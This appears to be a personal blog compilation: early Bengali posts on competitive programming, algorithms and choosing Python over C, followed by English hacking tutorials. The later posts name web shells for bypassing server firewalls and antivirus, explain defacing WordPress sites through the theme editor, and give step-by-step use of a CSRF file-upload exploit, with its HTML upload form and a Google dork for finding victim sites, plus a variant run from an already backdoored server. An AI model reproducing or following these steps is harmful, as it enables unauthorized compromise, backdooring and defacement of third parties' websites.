এই সাইটগুলোতে একাউন্ট খুলে প্রব্লেম সমাধান চর্চা করতে পারেন।এবার, লাভ কি?সমস্যা সমাধান করতে গিয়ে আপনাকে অনেক এলগরিদম শিখতে হবে, যা পরে আপনার প্রোগ্রামিং স্কিল বাড়িয়ে দেবে।চাকরির ক্ষেত্রে এটি উল্লেখ করতে পারবেন।এখানে সকল দেশের প্রোগ্রামার কম্পিটিশন করে থাকে,কাজেই আপনার দক্ষতা কেমন তা এখান থেকে অনুমান করা যাবে।অনেকেরই কম্পিটিটিভ প্রোগ্রামিং এ আগ্রহ নাই,থাকে না অথবা চলে যায়।তাদের জোর করে এসব করার প্রয়োজন নেই।
কিছু ফলাফল পাবেন সমাধান ওয়েবসাইটে সাবমিট করার পর যাকে বলে “verdict”
Accepted: আপনার সমাধান সঠিক।
Wrong Answer: আপনার উত্তর সঠিক নয়।আপনাকে আবার চেষ্টা করতে হবে।
Presentation Error: প্রিন্ট করার সঠিক সিনট্যাক্স ফলো না করলে আসবে।চেক করবেন আপনি অতিরিক্ত স্পেস অথবা লাইন প্রিন্ট করে ফেলছেন কিনা।
Time Limit Exceeded: প্রতি সমস্যার সমাধান প্রিন্ট করতে আপনার কোড ন্যুনতম সময় ব্যয় করবে।এর বেশি করলে তা গ্রহনযোগ্য হবে না।
Compilation Error: আপনার কোডে কোথাও সিনট্যাক্স ভুল করেছেন অথবা আপনি বেশি রিসোর্স ব্যবহার করেছেন যা কোড রান করতে বাধা দিচ্ছে।
এই ছিল কম্পিটিটিভ প্রোগ্রামিং নিয়ে কিছু কথা।
উপরের কোড সমাধান করার হিন্টসঃ
আপনাকে ইনপুটে কতটি সংখ্যা নেয়া হল,তা সাথে সাথে প্রিন্ট করতে হবে।প্রথমে একটি লুপ চালাতে হবে।প্রথম ইনপুট যা হবে, লুপ ততবার চলবে।
সময় নিয়ে পড়েছেন, সে জন্য ধন্যবাদ।ভাল লাগলে শেয়ার করতে ভুলবেন না :)

এলগরিদম?সেটা আবার কি?

এলগরিদম?সেটা আবার কি?
আপনি যখনি একটা কাজ করতে চান, আপনাকে নিশ্চয়ই কয়েকটা ধাপেই কাজটি করতে হয়।উদাহরন দেই।তাহলে সহজে বুঝতে পারবেন।ধরুন, আপনি বিছানায় শুয়ে আছেন।আপনার বিছানা জানালার পাশে।আপনার ইচ্ছা হচ্ছে, আপনি বাইরে ঘুরতে বের হবেন।আপনার মনে হল, বাইরে যদি বৃষ্টি হয়, তবে যাবেন না।আর যদি বৃষ্টি না থাকে, তবেই বের হবেন।এবার দেখা যাক, আপনার বের হবার সিদ্ধান্ত আপনি কি কি ধাপে নিবেন।
ধাপ ১ - আপনি বিছানা থেকে জানালা দিয়ে বাইরে তাকাবেন।
ধাপ ২ - যদি বাইরে বৃষ্টি হয়, তবে আপনি ঘরেই থাকবেন।(মনে করুন, আপনার কাজ এখানেই শেষ)
ধাপ ৩ - যদি বৃষ্টি না হয়, তবে আপনি বিছানা থেকে উঠবেন।
ধাপ ৪ - আপনি বাইরে যাবার জন্য কাপড় বদলাবেন।
ধাপ ৫ - আপনি দরজা দিয়ে বের হয়ে যাবেন।
ধাপ ৬ - সমাপ্ত।
এই যে কয়েক ধাপে কাজ করলেন, এই ধাপগুলোই মূলত এলগরিদম নামে পরিচিত।আপনার একটা সমস্যা সমাধান করার জন্য আপনাকে অবশ্যই একটি ধাপে এগুতে হবে।অন্যথায় সমস্যা সমাধান করতে পারবেন না।প্রোগ্রামিং এ, ধরুন আপনাকে বলা হল, এমন একটি প্রোগ্রাম লিখুন যেখানে আপনাকে তিনটি সংখ্যা দেওয়া হবে যা হবে একটি ত্রিভুজের তিনটি কোণের পরিমান।আপনাকে বের করতে হবে সংখ্যাগুলো দিয়ে ত্রিভুজ তৈরি করা যাবে কিনা।এবার, আমরা জানি, ত্রিভুজের তিন কোণের সমষ্টি ১৮০ ডিগ্রি।এবং কোন কোণই ০ ডিগ্রি হবে না।এর জন্য আপনার এলগরিদম হতে পারেঃ
১ - আপনি ৩ টি কোণের মান নিলেন।
২ - মানগুলোর যোগফল ১৮০ ডিগ্রি হলে এবং কোন কোণই ০ ডিগ্রি না হলেই প্রিন্ট করবেন ত্রিভুজ।
৩ - মানগুলো ২ নং এর মতো না হলে প্রিন্ট করবেন ত্রিভুজ নয়।
৪ - প্রোগ্রামের সমাপ্তি।
কাজেই বুঝতে পারছেন যে একটা প্রোগ্রাম তৈরি করতে আপনাকে আগে কোড ডিজাইন করতে হবে এবং সে ডিজাইন অনুযায়ী এগুতে হবে।সে ডিজাইনই আপনার এলগরিদম :)
আপনি যদি না ই জানেন কিভাবে ত্রিভুজ কিনা বের করা যায়, আপনি উক্ত সমস্যার জন্য কি প্রোগ্রাম তৈরি করতে পারবেন?এটাই ছিল এলগরিদম নিয়ে কথাবার্তা।বুঝতেই পারছেন, ভাল এলগরিদম পারতে হলে আপনার গণিতে দক্ষতা কতটা জরুরী!মুখস্ত তো সবাই করতে পারে!কিন্তু ভাল প্রোগ্রামার কয়জন?কাজেই, সবার জন্য শুভ কামনা রইল।
ভাল থাকবেন।

কম্পিউটার প্রোগ্রামার হতে চান, কোন ল্যাংগুয়েজ দিয়ে শুরু করবেন?

কম্পিউটার প্রোগ্রামার হতে চান, কোন ল্যাংগুয়েজ দিয়ে শুরু করবেন?
আমাদের অনেকেরই একজন দক্ষ প্রোগ্রামার হবার শখ আছে।কিন্তু, সবার তো আর সিএসই নিয়ে পড়াশোনা করার অথবা ভাল প্রোগ্রামিং এর শিক্ষক যোগাড় করার সামর্থ্য হয় না।আবার যারা এখনো বিশ্ববিদ্যালয়ে পড়ার যোগ্য হয়নি, তারা কি করে প্রোগ্রামিং শিখবে?মূলত, ইচ্ছা ই সবকিছু।আপনি যদি প্রোগ্রামিং শিখতে চান, প্রথমেই আপনার যা যা থাকতে হবেঃ
১.সৃজনশীল চিন্তা করার ক্ষমতা।
২.গনিতে পারদর্শিতা।
৩.দ্রুত সমস্যা সমাধান করার দক্ষতা।
৪.এলগরিদম বানানোর এবং সেটা প্রয়োগ করার ক্ষমতা।
এগুলো যদি আপনি ভাল বুঝেন, তবে আপনার কাজ অনেকটাই এগিয়ে গেল।
এবার আসি কোন ল্যাংগুয়েজ দিয়ে প্রোগ্রামিং শুরু করতে পারেন সে বিষয়ে।সবাই বলবে প্রোগ্রামিং এ হাতেখড়ি এর জন্য সি প্রোগ্রামিং সেরা।আমি বলব,না!আপনি পাইথন প্রোগ্রামিং দিয়ে শুরু করুন এবং কথা দিচ্ছি, পরবর্তীতে আপনি সি ও সহজেই বুঝে নিতে পারবেন।মূলত, সকল প্রোগ্রামিং ভাষাই প্রায় এক এবং এক নিয়মেই কোড করতে হয়।কাজেই, আপনি একটায় সুদক্ষ হয়ে গেলে বাকিগুলো হাতের ময়লা হবে আপনার কাছে।বলতে পারেন, সবাই যেখানে সি শিখতে বলে, সেখানে আমি পাইথন আগে শিখার কথা কেন বলছি?কারন তো বলবই :)
আর সব প্রোগ্রামিং ভাষার তুলনায় পাইথন অনেকটা সহজ সিনট্যাক্স মেইনটেইন করে বলে নতুন প্রোগ্রামারদের জন্য এই ভাষা অনেক সহজ।আমি কোডের উদাহরন দেখাইঃ
একটি সি প্রোগ্রামঃ
#include <stdio.h>
int main(){
int a = 5;
int b = 8;
printf(“%d\n”,a+b);
return 0;
}
একই প্রোগ্রাম পাইথনেঃ
a=5
b=8
print a+b
সি তে এরকম অনেক প্যাচাল আছে যা পাইথনে কোড করতে সময় লাগেই না!!!এমনকি এতো সেমিকোলন,রিটার্ন টাইপ ইত্যাদি ইত্যাদি দেয়ারও দরকার হবে না পাইথনে যা সি তে অনিবার্য!!
শুরুতেই যদি প্যাচাল দিয়ে প্রোগ্রামিং শিখেন, তাহলে আপনার আগ্রহ হয়তো কমে যেতেও পারে!!!পাইথনের সহজ কোডিং করে যদি একবার ধারা ধরে ফেলতে পারেন, আপনাকে আটকায় কে!!হয়ে যেতে পারেন সেরাদের সেরা!তবে, একথা সত্য যে পাইথন সি এর তুলনায় অনেক নিম্নগতির এবং কিছু কিছু কোড পাইথনে করা যাবে না আবার সি তে করা যাবে(পাইথনে করা যায় কিন্তু সি তে করা যায় না এরকমও আছে,তবে সি টা স্ট্যান্ডার্ড)।তবে, নিশ্চিত থাকেন, শুরুতেই এডভান্সড কিছু আপনি শিখতে যাচ্ছেন না।কাজেই পাইথন আপনাকে প্রোগ্রামিং এর বেসিকে অনেকটাই সাহায্য করবে বলে আশা করছি(আমার নিজের ক্ষেত্রেও অনেক হেল্প হয়েছে)।
এবার আসি আরো কিছু কথায়।আপনি এখন চাচ্ছেন ওয়েব ডেভেলপমেন্ট ভাষা শিখবেন, আমার কথা শুনে এগুলা শুরু করলেন,ভাল কিন্তু আপনার মূল গন্তব্য এইটা না!পাইথনে বেসিক এলগরিদম যদি আপনি প্রয়োগ করে ফেলার যোগ্য হয়ে যান, তবে আপনি অন্য ভাষা শিখে ফেলার জন্য প্রস্তুত।প্রোগ্রামিং মানে এই না, যে আপনি “hello world” প্রিন্ট করে নিজেকে মহান প্রোগ্রামার ভাবা শুরু করে দিলেন।প্রোগ্রামিং একটা শিল্প।এটা আপনার দক্ষতা।আপনি কত দ্রুত একটা সমাধান করার এলগরিদম তৈরি করছেন অথবা নতুন কিছু চিন্তা করছেন,সেটার সঠিক প্রয়োগ হল প্রোগ্রামিং।”Hello world” তো যে কেউ প্রিন্ট করতে পারে।এর মানে কি সবাই ভাল প্রোগ্রামার?না।আপনার টার্গেট একজন ভাল প্রোগ্রামার হওয়া উচিত।সামান্য কিছু জেনে সবার সামনে ভাব দেখিয়ে বেড়ানোটা প্রোগ্রামিং না(অধিকাংশ লোকেরাই এটা করে থাকে)।
সব কথার শেষে আরেকটা টপিক বহির্ভূত কথা বলতে চাই,
“হ্যাকার মানেই প্রোগ্রামার” অথবা “প্রোগ্রামার মানেই হ্যাকার” অথবা দুটোর কোনটাই আমি মানি না।
হ্যাকার হ্যাকারই,আর প্রোগ্রামার প্রোগ্রামারই।একজনের হয়তো দুটো দক্ষতা থাকতে পারে।কিন্তু এভাবে সূত্র দেওয়ার অধিকার কারো নাই।কেউ দেখুক আর না দেখুক, আমি “প্রোগ্রামিং জ্ঞান বিহীন হ্যাকার দেখেছি” এবং “হ্যাকিং এর জ্ঞান বিহীন প্রোগ্রামার দেখেছি”।সো, কম জ্ঞান নিয়ে কথা বললে ১০০ জন লোকের ৯৯ জন মেনে নিলেও আমি ১ জন ব্যতিক্রম থাকবোই :)
“Use your logic and brain to understand something. No rule to believe something that you hear from someone without checking the validity of what someone says”
সময় নিয়ে পড়ার জন্য ধন্যবাদ :)

Tuesday, December 27, 2016

[From Own Experience] Server Security Bypass Techniques

[From Own Experience] Server Security Bypass Techniques

Assalamualaikum all. This note will be covering some techniques to bypass server firewall when uploading shell(next is what, hope you know it well :p ) <b>NOTE : I WILL BE NAMING SOME SHELLS BUT NOT GIVING ANY LINKS TO DOWNLOAD THEM</b> Bypass Cloudflare, LightSpeed : use madspot shell Bypass SecureServer : use alfa team shell Bypass mod_security : use madspot codes by editing a file(uploader wont work) then upload k2ll33d shell from madspot shell's upload panel. Bypass antivirus scanners("thread detected ...") : use webadmin shell or even its too gets detected, try alfa or *this one is private :p * Bypass other secured servers : try any of these = madspot,alfa shell,k2ll33d,dhanush,wso etc.(if doesnt load, so sorry, you cant plant shell.) thats all. end of note ...

Deface Wordpress site's index when you can't plant shell

Deface Wordpress site's index when you can't plant shell
Before proceeding : Must have permissions to edit wordpress theme files. There can be several ways(executing php codes and doing blah blah blah), I am mentioning very easy one that worked fine for me or can be confirmed as 'tested'. okay, let's get onto the action ... go to localhost/installed-wp-directory/wp-admin/theme-editor.php (admin panel access required!) now, click on 'header.php' of active theme(note that,'active theme') of the site.replace all codes with 'file uploader form(php scripted, available in google)' navigate to localhost/installed-wp-directory/index.php you will see 'file uploader' on top of homepage!now select your deface page(ex. index.php) and upload.when finished, reload the page :D pwned :p or localhost/wp-installed-directory/deface-page.php done ... Greets to : Allah for giving me a brain.Alhamdulillah. end of tutorial ..

How to use Remote File Upload Exploit with php script

How to use Remote File Upload Exploit with php script

Now, I will be guiding you all about using a type of exploit most often found in exploit database sites. Look at the below exploit as an example : ------------------------------------------- ?#?Title? : Wordpress Dimension Themes CSRF File Upload Vulnerability ?#?Author? : DevilScreaM ?#?Date? : 11/17/2013 - 17 November 2013 ?#?Category? : Web Applications ?#?Type? : PHP ?#?Vendor? : http://themeforest.net ?#?Download? : http://themeforest.net/item/dimension-retina-responsive-multipurpose-theme/ ?#?Greetz? : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber ?#?Thanks? : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded | ?#?Tested? : Mozila, Chrome, Opera -> Windows & Linux ?#?Vulnerabillity? : CSRF ?#?Dork? : inurl:wp-content/themes/dimension CSRF File Upload Vulnerability Exploit & POC : http://site-target/wp-content/themes/dimension/library/includes/upload-handler.php Script : <form enctype="multipart/form-data" action="http://127.0.0.1/wp-content/themes/dimension/library/includes/upload-handler.php" method="post"> Your File: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form> File Access : http://site-target/uploads/[years]/[month]/your_shell.php Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php ------------------------------------------- This is a wordpress exploit titled "Wordpress Dimension Themes CSRF File Upload Vulnerability" to use this exploit, you will be required of a ftp server.or, install AppServ in your pc, which will allow you to execute php scripts in your browser. STEP 1 : Download AppServ from internet STEP 2 : Open notepad and paste "Script"(check in top.there are some php codes) and save file as "exploit.php" in public_html directory and paste any shells like madspot,wso,k2ll33d shells STEP 3 : Search the given dork in google and select any site(note : if you can't find shell in shell location, you have to try another) STEP 4 : Open the php file in notepad and find http://127.0.0.1/wp-content/themes/dimension/library/includes/upload-handler.php and replace the 127.0.0.1 with the site url you got STEP 5 : Now save the php file and open in browser(make sure you have have AppServ successfully running) STEP 6 : Select your shell and upload.Once after successful upload, you have to visit http://127.0.0.1/uploads/[years]/[month]/your_shell.php (http://127.0.0.1/wp-content/uploads/2016/01/madspot.php) STEP 7 : If the site is vulnerable, your shell should be planted successfully.If there is no shell, try other sites. N.B : All exploits of this type can be used using this way...Some exploits attempts to upload shell.php automatically(ex. wordpress rightnow theme vulnerability). ./The_End

How to use Remote File Upload Exploit with php script [Mobile Friendly Edition]

How to use Remote File Upload Exploit with php script [Mobile Friendly Edition]

How to use https://mobile.facebook.com/notes/choyon-ahmed/how-to-use-remote-file-upload-exploit-with-php-script/1542511916063089/ exploit in mobile?
Well, let's show some more actions :P You need some advanced level skills for this or you can borrow from someone expert ;) [+] Things required : 1.A shelled site(backdoored) 2.Exploit 3.Your brain! [+] Steps : STEP 1 : Suppose, you have the shell located in http://127.0.0.1/shell.php & Create a file named "exploit.php" using shell(backdoor) panel STEP 2 : use shell to edit and save file instead of notepad.A shelled site itself runs on a computer. ;) STEP 3 : visit http://127.0.0.1/exploit.php and boom :D you have it done ;) oka? STEP 4 : check for the shell and if exists, you got the money in hand ^_^ ./The_End